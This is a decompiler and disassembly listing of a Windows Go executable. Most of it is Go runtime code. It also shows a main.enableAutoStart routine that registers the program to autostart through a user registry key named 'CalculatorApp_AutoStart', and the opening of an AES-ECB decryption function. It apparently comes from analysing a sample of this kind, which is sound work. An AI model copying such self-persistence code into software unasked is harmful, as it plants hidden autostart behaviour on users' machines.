mov ecx, 0x2D
mov edi, 0x02
call golang.org.x.sys.windows.registry.OpenKey()
test rbx, rbx
jz .1
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
.1:
movups [rsp+0x40], xmm15
lea rdx, [main.enableAutoStart.func1()]
mov [rsp+0x40], rdx
mov [rsp+0x48], rax
lea rdx, [rsp+0x40]
mov [rsp+0x58], rdx
mov byte ptr [rsp+0x37], 0x01
nop
lea rbx, ["CalculatorApp_AutoStart"]
mov ecx, 0x17
mov edi, 0x01
mov rsi, [rsp+0x50]
mov r8, [rsp+0x38]
nop
call golang.org.x.sys.windows.registry.Key.setStringValue()
mov byte ptr [rsp+0x37], 0x00
mov rdx, [rsp+0x58]
mov r9, [rdx]
call r9
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
.2:
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
.3:
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
call runtime.deferreturn()
mov rbp, [rsp+0x60]
add rsp, 0x68
ret
.4:
call runtime.morestack_noctxt()
jmp main.enableAutoStart()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void main.enableAutoStart(void)
{
undefined8 extraout_RAX;
int64_t extraout_RCX;
int64_t extraout_RCX_00;
undefined8 extraout_RBX;
int64_t unaff_R14;
undefined auVar1 [16];
undefined auStack_28 [16];
undefined8 uStack_18;
code **ppcStack_10;
while (&stack0x00000000 <= *(unaff_R14 + 0x10)) {
runtime.morestack_noctxt();
}
ppcStack_10 = 0x0;
os.Executable();
if (extraout_RCX != 0) {
return;
}
path.filepath.abs();
if (extraout_RCX_00 != 0) {
return;
}
uStack_18 = extraout_RAX;
auVar1 = golang.org.x.sys.windows.registry.OpenKey(0x80000001, &autorun, 0x2d, 2);
if (auVar1._8_8_ != 0) {
return;
}
auStack_28._8_8_ = auVar1._0_8_;
auStack_28._0_8_ = main.enableAutoStart.func1;
ppcStack_10 = auStack_28;
golang.org.x.sys.windows.registry.Key.setStringValue(auVar1._0_8_, "CalculatorApp_AutoStart", 0x17, 1, uStack_18, extraout_RBX);
(**ppcStack_10)();
return;
}
0x436D00 badctxt str 1 api 0 imm 3 Unknown
runtime.badctxt() {
sub rsp, 0x18
mov [rsp+0x10], rbp
lea rbp, [rsp+0x10]
lea rax, ["ctxt != 0"]
mov ebx, 0x09
call runtime.throw()
nop
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void runtime.badctxt(void)
{
undefined8 uVar1;
int64_t iVar2;
int64_t extraout_RAX;
uint64_t extraout_RCX;
undefined8 extraout_RBX;
int64_t iVar3;
undefined *puVar4;
undefined *puVar5;
undefined *puVar6;
int64_t unaff_R14;
undefined auVar7 [16];
undefined auStack_18 [16];
puVar6 = &stack0xfffffffffffffff8;
iVar2 = runtime.throw("ctxt != 0", 9);
puVar4 = auStack_18;
do {
puVar5 = puVar4;
if (*(unaff_R14 + 0x10) < puVar4) {
puVar5 = puVar4 + -0x50;
*(puVar4 + -8) = puVar6;
puVar6 = puVar4 + -8;
if (*(iVar2 + 0x90) != 0) {
*(puVar4 + 8) = iVar2;
*(puVar4 + -0x58) = 0x436d5b;
runtime.lock2(0x5a2388);
auVar7._8_8_ = [0x0x54f468] + 1U;
auVar7._0_8_ = [0x0x54f460];
iVar2 = [0x0x54f460];
if ([0x0x54f470] < [0x0x54f468] + 1U) {
*(puVar4 + -0x58) = 0x436d89;
runtime.growslice();
auVar7._8_8_ = extraout_RBX;
auVar7._0_8_ = extraout_RAX;
iVar2 = extraout_RAX;
000000000054f470 = extraout_RCX;
if ([0x0x5a2550] != 0) {
*(puVar4 + -0x58) = 0x436dae;
auVar7 = runtime.gcWriteBarrier();
iVar2 = [0x0x54f460];
}
}
[0x0x54f460] = iVar2;
000000000054f468 = auVar7._8_8_;
if ([0x0x5a2550] == 0) {
*(auVar7._0_8_ + -8 + 000000000054f468 * 8) = *(puVar4 + 8);
}
else {
*(puVar4 + -0x58) = 0x436ddc;
runtime.gcWriteBarrierDX();
}
if ([0x0x54f468] != 0) {
iVar2 = [0x0x54f460];
if ([0x0x54f010] != [0x0x54f460]) {
iVar3 = [0x0x54f460];
if ([0x0x5a2550] != '\0') {
*(puVar4 + -0x10) = [0x0x54f460];
*(puVar4 + -0x58) = 0x436e13;
runtime.atomicwb(0x54f010);
iVar3 = *(puVar4 + -0x10);
}
LOCK();
UNLOCK();
iVar2 = [0x0x54f010];
000000000054f010 = iVar3;
}
uVar1 = [0x0x5a2380];
LOCK();
[0x0x5a2380] = [0x0x54f468];
UNLOCK();
*(puVar4 + -0x58) = 0x436e45;
runtime.unlock2(0x5a2388, iVar2, uVar1);
return;
}
*(puVar4 + -0x58) = 0x436e59;
runtime.panicIndex(0, [0x0x54f460], 0);
}
*(puVar4 + -0x58) = 0x436e6a;
iVar2 = runtime.throw("allgadd: bad status Gidle", 0x19);
}
*(puVar5 + 8) = iVar2;
*(puVar5 + -8) = 0x436e75;
runtime.morestack_noctxt();
iVar2 = *(puVar5 + 8);
puVar4 = puVar5;
} while( true );
}
0x459120 morestackc str 1 api 0 imm 3 Unknown
runtime.morestackc() {
sub rsp, 0x18
mov [rsp+0x10], rbp
lea rbp, [rsp+0x10]
lea rax, ["attempt to execute system stack code on user stack"]
mov ebx, 0x32
call runtime.throw()
nop
}
/* DISPLAY WARNING: Type casts are NOT being printed */
code * runtime.morestackc(void)
{
uint16_t uVar1;
int64_t extraout_RAX;
undefined8 *puVar2;
int64_t iVar3;
undefined uVar4;
uint8_t uVar5;
undefined extraout_CL;
uint64_t extraout_RCX;
int64_t iVar6;
int64_t iVar7;
uint64_t uVar8;
uint64_t uVar9;
char extraout_BL;
undefined8 extraout_RBX;
undefined8 uVar10;
undefined *puVar11;
undefined *puVar12;
undefined *puVar13;
uint64_t extraout_RSI;
uint64_t uVar14;
uint64_t extraout_R8;
int64_t unaff_R14;
bool bVar15;
undefined in_XMM15 [16];
undefined auVar16 [16];
undefined auStack_18 [16];
puVar13 = &stack0xfffffffffffffff8;
runtime.throw("attempt to execute system stack code on user stack", 0x32);
iVar3 = extraout_RAX;
uVar14 = extraout_RCX;
uVar10 = extraout_RBX;
puVar11 = auStack_18;
do {
auVar16._8_8_ = uVar10;
auVar16._0_8_ = iVar3;
uVar4 = uVar14;
puVar12 = puVar11;
if (*(unaff_R14 + 0x10) < puVar11 + -0x78) {
puVar12 = puVar11 + -0xf8;
*(puVar11 + -8) = puVar13;
puVar13 = puVar11 + -8;
*(puVar11 + 8) = iVar3;
*(puVar11 + 0x10) = uVar10;
if ((iVar3 != 0) && ((*(iVar3 + 0x17) & 0x1f) == 0x13)) {
*(puVar11 + -0x98) = in_XMM15;
*(puVar11 + -0x88) = in_XMM15;
*(puVar11 + -0x78) = in_XMM15;
*(puVar11 + -0x68) = in_XMM15;
if ((*(iVar3 + 0x14) & 1) == 0) {
iVar6 = 0x38;
}
else {
iVar6 = 0x48;
}
uVar14 = *(iVar3 + 0x30);
iVar6 = iVar6 + iVar3;
if (uVar14 < 0x100001) {
*(puVar11 + -0xb0) = iVar3;
*(puVar11 + -0xc0) = iVar6;
*(puVar11 + -0xb8) = uVar10;
*(puVar11 + -200) = uVar14;
iVar7 = 0;
while (iVar7 < uVar14) {
*(puVar11 + -0xd0) = iVar7;
uVar10 = *(iVar6 + iVar7 * 8);
*(puVar11 + -0x100) = 0x459205;
runtime.(*abiDesc).assignArg(puVar11 + -0x98, uVar10);
iVar3 = *(puVar11 + -0xb0);
uVar10 = *(puVar11 + -0xb8);
uVar14 = *(puVar11 + -200);
iVar6 = *(puVar11 + -0xc0);
iVar7 = *(puVar11 + -0xd0) + 1;
}
uVar9 = *(puVar11 + -0x78) + 7U & 0xfffffffffffffff8;
*(puVar11 + -0x78) = uVar9;
*(puVar11 + -0x60) = uVar9;
uVar1 = *(iVar3 + 0x30);
uVar14 = uVar1;
uVar8 = (*(iVar3 + 0x32) & 0x7fff) + uVar1 & 0xffff;
if (uVar14 <= uVar8) {
uVar14 = uVar14 - 0x100000 >> 0x3f & uVar14 << 3;
if (uVar8 - uVar1 == 1) {
if ((*(iVar3 + 0x14) & 1) == 0) {
iVar6 = 0x38;
}
else {
iVar6 = 0x48;
}
if (**(iVar6 + iVar3 + uVar14) == 8) {
if ((*(iVar3 + 0x14) & 1) == 0) {
iVar6 = 0x38;
}
else {
iVar6 = 0x48;
}
uVar5 = *(*(iVar6 + iVar3 + uVar14) + 0x17) & 0x1f;
if ((uVar5 != 0xd) && (uVar5 != 0xe)) {
if ([0x0x52f3a8] == 0) {
*(puVar11 + -0x78) = uVar9 + 8;
}
if ((*(puVar11 + -0x78) + 7U & 0xfffffffffffffff8) + *(puVar11 + -0x70) < 0x201) {
*(puVar11 + -0xa8) = 0;
puVar11[-0xa0] = 0;
*(puVar11 + -0xa8) = uVar10;
puVar11[-0xa0] = 0;
*(puVar11 + -0x100) = 0x459354;
runtime.lock2(0x57b1a0);
*(puVar11 + -0x100) = 0x45936c;
puVar2 = runtime.mapaccess2(0x486920, [0x0x5a22a8], puVar11 + -0xa8);
if (extraout_BL != '\0') {
*(puVar11 + -0xd8) = *puVar2;
*(puVar11 + -0x100) = 0x4594f9;
runtime.unlock2(0x57b1a0);
return runtime.callbackasm + *(puVar11 + -0xd8) * 5;
}
iVar3 = [0x0x5a22a8];
if ([0x0x5a22a8] == 0) {
*(puVar11 + -0x100) = 0x459387;
iVar3 = runtime.makemap_small();
if ([0x0x5a2550] != 0) {
*(puVar11 + -0x100) = 0x4593a5;
runtime.gcWriteBarrier();
iVar3 = [0x0x5a22a8];
}
}
[0x0x5a22a8] = iVar3;
bVar15 = [0x0x5a22b0] < 2000;
if ([0x0x5a22b0] < 2000) {
*(puVar11 + -0x108) = puVar13;
*(puVar11 + -0x100) = 0x4593d3;
auVar16 = func_0x0045d5f0();
iVar3 = auVar16._0_8_;
puVar13 = *(puVar11 + -0x108);
*(puVar11 + -0x58) = *(puVar11 + -0xa8);
*(puVar11 + -0x48) = *(puVar11 + -0x98);
*(puVar11 + -0x44) = *(puVar11 + -0x94);
*(puVar11 + -0x40) = *(puVar11 + -0x90);
*(puVar11 + -0x3c) = *(puVar11 + -0x8c);
*(puVar11 + -0x38) = *(puVar11 + -0x88);
*(puVar11 + -0x34) = *(puVar11 + -0x84);
*(puVar11 + -0x30) = *(puVar11 + -0x80);
*(puVar11 + -0x2c) = *(puVar11 + -0x7c);
*(puVar11 + -0x28) = *(puVar11 + -0x78);
*(puVar11 + -0x24) = *(puVar11 + -0x74);
*(puVar11 + -0x20) = *(puVar11 + -0x70);
*(puVar11 + -0x1c) = *(puVar11 + -0x6c);
*(puVar11 + -0x18) = *(puVar11 + -0x68);
*(puVar11 + -0x14) = *(puVar11 + -100);
*(puVar11 + -0x10) = *(puVar11 + -0x60);
*(puVar11 + -0xc) = *(puVar11 + -0x5c);
if (bVar15) {
*(puVar11 + -0xe0) = iVar3;
*(puVar11 + -200) = iVar3 * 5;
if ([0x0x5a2550] == 0) {
*(puVar11 + -0x108) = puVar13;
*(puVar11 + -0x100) = 0x45946f;
func_0x0045d95a();
}
else {
*(puVar11 + -0x100) = 0x45948c;
runtime.typedmemmove
(0x48c200, iVar3 * 0x50 + 0x57b1a8, puVar11 + -0x58);
}
*(puVar11 + -0x100) = 0x4594a5;
puVar2 = runtime.mapassign(0x486920, [0x0x5a22a8],
puVar11 + -0xa8);
*puVar2 = *(puVar11 + -0xe0);
[0x0x5a22b0] = [0x0x5a22b0] + 1;
*(puVar11 + -0x100) = 0x4594c5;
runtime.unlock2(0x57b1a0);
return runtime.callbackasm + *(puVar11 + -200);
}
*(puVar11 + -0x100) = 0x459527;
runtime.panicIndex(iVar3, auVar16._8_8_, 2000);
}
*(puVar11 + -0x100) = 0x459536;
runtime.unlock2(0x57b1a0);
*(puVar11 + -0x100) = 0x459547;
runtime.throw("too many callback functions", 0x1b);
}
*(puVar11 + -0x100) = 0x45955a;
runtime.gopanic("\u25ba", 0x4b1da0);
}
*(puVar11 + -0x100) = 0x45956d;
runtime.gopanic("\u25ba", 0x4b1d90);
}
*(puVar11 + -0x100) = 0x459585;
runtime.gopanic("\u25ba", 0x4b1d80);
}
*(puVar11 + -0x100) = 0x459598;
runtime.gopanic("\u25ba", 0x4b1d80);
uVar14 = extraout_R8;
}
*(puVar11 + -0x100) = 0x4595a5;
auVar16 = runtime.panicSliceB(uVar14 & 0xffffffff);
uVar14 = extraout_RSI;
}
*(puVar11 + -0x100) = 0x4595b2;
runtime.panicSliceAlen(auVar16._0_8_, auVar16._8_8_, uVar14);
}
*(puVar11 + -0x100) = 0x4595c5;
auVar16 = runtime.gopanic("\u25ba", 0x4b1d80);
uVar4 = extraout_CL;
}
*(puVar12 + 8) = auVar16;
puVar12[0x18] = uVar4;
*(puVar12 + -8) = 0x4595d9;
runtime.morestack_noctxt();
iVar3 = *(puVar12 + 8);
uVar10 = *(puVar12 + 0x10);
uVar14 = puVar12[0x18];
puVar11 = puVar12;
} while( true );
/* listing truncated */0x46F940 Error str 1 api 0 imm 2 Unknown
internal.poll.errNetClosing.Error() {
lea rax, ["use of closed network connection"]
mov ebx, 0x20
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
undefined [16] internal.poll.errNetClosing.Error(void)
{
undefined auVar1 [16];
auVar1._8_8_ = 0x20;
auVar1._0_8_ = "use of closed network connection";
return auVar1;
}
0x45E540 EntryPoint str 0 api 1 imm 0 Unknown
EntryPoint() {
jmp _rt0_amd64()
}
/* WARNING: Removing unreachable block (ram,0x0045a9c6) */
/* WARNING: Removing unreachable block (ram,0x0045a99b) */
/* DISPLAY WARNING: Type casts are NOT being printed */
void EntryPoint(void)
{
int32_t *piVar1;
undefined4 *puVar2;
uint32_t uVar3;
undefined8 uVar4;
code *pcVar5;
int32_t iVar6;
uint64_t uVar7;
uint64_t extraout_RBX;
int64_t in_GS_OFFSET;
undefined4 unaff_retaddr;
undefined auStack_ffc8 [65416];
undefined8 uStack_40;
undefined8 uStack_38;
undefined4 auStack_30 [2];
undefined *puStack_28;
undefined4 uStack_18;
undefined *puStack_10;
puStack_10 = &stack0x00000008;
puRam000000000054f808 = auStack_30;
pcRam000000000054f800 = auStack_ffc8;
piVar1 = cpuid_basic_info(0);
uVar3 = piVar1[1];
iVar6 = piVar1[3];
if (*piVar1 != 0) {
if (((uVar3 == 0x756e6547) && (piVar1[2] == 0x49656e69)) && (iVar6 == 0x6c65746e)) {
[0x0x5a22ca] = 1;
}
puVar2 = cpuid_Version_info(1);
00000000005a232c = *puVar2;
uVar3 = puVar2[1];
iVar6 = puVar2[3];
}
uVar7 = uVar3;
pcVar5 = 0x54eea0;
puVar2 = auStack_30;
pcRam000000000054f818 = pcRam000000000054f800;
uStack_18 = unaff_retaddr;
if (0x54eea0 != 0x0) {
uStack_38 = 0x45aa04;
pcRam000000000054f810 = pcRam000000000054f800;
pcRam000000000054f818 = pcRam000000000054f800;
(*0x54eea0)(0x54eea0, uVar7, 0x54f800, 0x54f800, setg_gcc, 0x5a24c8, 0);
iVar6 = 0x54f800;
pcVar5 = 0x54f800 + 0x13a0;
uVar7 = extraout_RBX;
puVar2 = 0x54f808;
pcRam000000000054f818 = pcVar5;
}
0x54f808 = puVar2;
uStack_38 = 0x45aa21;
pcRam000000000054f810 = 0x54f818;
runtime.wintls(pcVar5, uVar7, iVar6);
uStack_38 = 0x45aa2d;
runtime.settls();
**(in_GS_OFFSET + [0x0x5a24c8]) = 0x123;
if ([0x0x54fbf8] != 0x123) {
uStack_38 = 0x45aa53;
runtime.abort();
}
**(in_GS_OFFSET + [0x0x5a24c8]) = 0x54f800;
[0x0x54fba0] = 0x54f800;
[0x0x54f830] = 0x54fba0;
uStack_38 = 0x45aa7c;
runtime.check();
auStack_30[0] = uStack_18;
puStack_28 = puStack_10;
uStack_38 = 0x45aa92;
runtime.args();
uStack_38 = 0x45aa97;
runtime.osinit();
uStack_38 = 0x45aa9c;
runtime.schedinit();
uStack_38 = 0x4b1c90;
uStack_40 = 0x45aaa9;
runtime.newproc();
uVar4 = uStack_38;
uStack_38 = 0x45aaaf;
runtime.mstart(uVar4);
uStack_38 = 0x45aab4;
runtime.abort();
return;
}
0x44A5E0 fastrand str 0 api 0 imm 14 Unknown
runtime.fastrand() {
mov rcx, [r14+0x30]
mov rax, 0xA0761D6478BD642F
add rax, [rcx+0xF0]
mov rdx, 0xE7037ED1A0B428DB
xor rdx, rax
mov rbx, rax
mul rdx
mov [rcx+0xF0], rbx
xor rax, rdx
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t runtime.fastrand(void)
{
undefined auVar1 [16];
undefined auVar2 [16];
uint64_t uVar3;
int64_t unaff_R14;
uVar3 = *(*(unaff_R14 + 0x30) + 0xf0) + 0xa0761d6478bd642f;
auVar1._8_8_ = 0;
auVar1._0_8_ = uVar3;
auVar2._8_8_ = 0;
auVar2._0_8_ = uVar3 ^ 0xe7037ed1a0b428db;
*(*(unaff_R14 + 0x30) + 0xf0) = uVar3;
return SUB168(auVar1 * auVar2, 0) ^ SUB168(auVar1 * auVar2, 8);
}
0x476C00 init str 0 api 0 imm 6 Unknown
golang.org.x.sys.windows.init() {
cmp rsp, [r14+0x10]
jbe .931
sub rsp, 0x10
mov [rsp+0x08], rbp
lea rbp, [rsp+0x08]
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .1
mov [0x53E958], rcx
jmp .2
.1:
lea rdi, [0x53E958]
call runtime.gcWriteBarrierCX()
.2:
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .3
mov [0x53E998], rcx
jmp .4
.3:
lea rdi, [0x53E998]
nop [rax], eax
call runtime.gcWriteBarrierCX()
.4:
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .5
mov [0x53E9D8], rcx
jmp .6
.5:
lea rdi, [0x53E9D8]
call runtime.gcWriteBarrierCX()
.6:
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .7
mov [0x53EA18], rcx
jmp .8
.7:
lea rdi, [0x53EA18]
call runtime.gcWriteBarrierCX()
.8:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .9
mov [0x53EA58], rcx
jmp .10
.9:
lea rdi, [0x53EA58]
call runtime.gcWriteBarrierCX()
.10:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .11
mov [0x53EA98], rcx
jmp .12
.11:
lea rdi, [0x53EA98]
call runtime.gcWriteBarrierCX()
.12:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .13
mov [0x53EAD8], rcx
jmp .14
.13:
lea rdi, [0x53EAD8]
call runtime.gcWriteBarrierCX()
.14:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .15
mov [0x53EB18], rcx
jmp .16
.15:
lea rdi, [0x53EB18]
nop
call runtime.gcWriteBarrierCX()
.16:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .17
mov [0x53EB58], rcx
jmp .18
.17:
lea rdi, [0x53EB58]
call runtime.gcWriteBarrierCX()
.18:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .19
mov [0x53EB98], rcx
jmp .20
.19:
lea rdi, [0x53EB98]
call runtime.gcWriteBarrierCX()
.20:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .21
mov [0x53EBD8], rcx
jmp .22
.21:
lea rdi, [0x53EBD8]
call runtime.gcWriteBarrierCX()
.22:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .23
mov [0x53EC18], rcx
jmp .24
.23:
lea rdi, [0x53EC18]
call runtime.gcWriteBarrierCX()
.24:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .25
mov [0x53EC58], rcx
jmp .26
.25:
lea rdi, [0x53EC58]
call runtime.gcWriteBarrierCX()
.26:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .27
mov [0x53EC98], rcx
jmp .28
.27:
lea rdi, [0x53EC98]
nop
call runtime.gcWriteBarrierCX()
.28:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .29
mov [0x53ECD8], rcx
jmp .30
.29:
lea rdi, [0x53ECD8]
call runtime.gcWriteBarrierCX()
.30:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .31
mov [0x53ED18], rcx
jmp .32
.31:
lea rdi, [0x53ED18]
call runtime.gcWriteBarrierCX()
.32:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .33
mov [0x53ED58], rcx
jmp .34
.33:
lea rdi, [0x53ED58]
call runtime.gcWriteBarrierCX()
.34:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .35
mov [0x53ED98], rcx
jmp .36
.35:
lea rdi, [0x53ED98]
call runtime.gcWriteBarrierCX()
.36:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .37
mov [0x53EDD8], rcx
jmp .38
.37:
lea rdi, [0x53EDD8]
call runtime.gcWriteBarrierCX()
.38:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .39
mov [0x53EE18], rcx
jmp .40
.39:
lea rdi, [0x53EE18]
nop
call runtime.gcWriteBarrierCX()
.40:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .41
mov [0x53EE58], rcx
jmp .42
.41:
lea rdi, [0x53EE58]
call runtime.gcWriteBarrierCX()
.42:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .43
mov [0x53EE98], rcx
jmp .44
.43:
lea rdi, [0x53EE98]
call runtime.gcWriteBarrierCX()
.44:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .45
mov [0x53EED8], rcx
jmp .46
.45:
lea rdi, [0x53EED8]
call runtime.gcWriteBarrierCX()
.46:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .47
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void golang.org.x.sys.windows.init(void)
{
int64_t unaff_R14;
while (&stack0x00000000 <= *(unaff_R14 + 0x10)) {
runtime.morestack_noctxt();
}
if ([0x0x5a2550] == 0) {
[0x0x53e958] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53e998] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53e9d8] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ea18] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ea58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ea98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ead8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eb18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eb58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eb98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ebd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ec18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ec58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ec98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ecd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ed18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ed58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ed98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53edd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ee18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ee58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ee98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eed8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ef18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ef58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ef98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53efd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f018] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f058] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f098] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f0d8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f118] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f158] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f198] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f1d8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
/* listing truncated */0x47BAC0 AesDecryptByECB str 0 api 0 imm 6 Unknown
main.AesDecryptByECB() {
lea r12, [rsp-0x98]
cmp r12, [r14+0x10]
jbe .10
sub rsp, 0x118
mov [rsp+0x110], rbp
lea rbp, [rsp+0x110]
mov [rsp+0x130], rcx
mov [rsp+0x120], rax
mov [rsp+0x140], rsi
mov [rsp+0x128], rbx
mov [rsp+0x138], rdi
movups [rsp+0xE0], xmm15
movups [rsp+0xF0], xmm15
movups [rsp+0x100], xmm15
lea rdi, [rsp+0x80]
lea rdi, [rdi-0x30]
nop [rax+rax*1], eax
mov [rsp-0x10], rbp
lea rbp, [rsp-0x10]
call loc_45d5f0
mov rbp, [rbp]
lea r8, [rsp+0x80]
mov [rsp+0xF0], r8
call runtime.fastrand()
mov [rsp+0xEC], eax
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov ecx, 0x10
call runtime.mapassign_fast64()
test [rax], al
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov ecx, 0x18
nop
call runtime.mapassign_fast64()
test [rax], al
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov ecx, 0x20
nop [rax+rax*1], eax
call runtime.mapassign_fast64()
test [rax], al
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov rcx, [rsp+0x140]
nop
call runtime.mapaccess2_fast64()
test bl, bl
jz .2
lea rax, [rsp+0x60]
mov rbx, [rsp+0x138]
mov rcx, [rsp+0x140]
call runtime.stringtoslicebyte()
call crypto.aes.NewCipher()
test rcx, rcx
jnz .1
mov [rsp+0xD0], rbx
mov [rsp+0x48], rax
mov rcx, [rax+0x18]
mov rax, rbx
call rcx
mov [rsp+0x40], rax
mov rbx, [rsp+0x128]
mov rcx, rbx
lea rax, [0x484180]
nop
call runtime.makeslice()
mov [rsp+0xD8], rax
mov rcx, [rsp+0x40]
mov rdx, [rsp+0x120]
mov rbx, [rsp+0xD0]
mov rsi, [rsp+0x130]
mov rdi, [rsp+0x128]
mov r8, [rsp+0x48]
mov r9, rcx
xor r10d, r10d
nop [rax], eax
jmp .4
.1:
xor eax, eax
xor ebx, ebx
mov rsi, rdi
mov rdi, rcx
mov rcx, rbx
mov rbp, [rsp+0x110]
add rsp, 0x118
ret
.2:
xor eax, eax
xor ebx, ebx
mov rcx, rbx
xor edi, edi
mov rsi, rax
mov rbp, [rsp+0x110]
add rsp, 0x118
ret
.3:
mov [rsp+0x38], r10
mov [rsp+0x50], rcx
mov r11, [r8+0x20]
sub rcx, r10
sub rdi, r10
mov r15, rdi
neg rdi
sar rdi, 0x3F
and rdi, r10
lea r13, [rdi+rax*1]
sub rsi, r10
mov [rsp+0x58], rsi
neg rsi
sar rsi, 0x3F
and rsi, r10
add rsi, rdx
mov rax, rbx
mov rbx, r13
mov rdi, r15
mov r8, rcx
mov r9, [rsp+0x58]
call r11
mov r9, [rsp+0x40]
mov rdx, [rsp+0x38]
lea r10, [rdx+r9*1]
mov rdx, [rsp+0x50]
lea rcx, [rdx+r9*1]
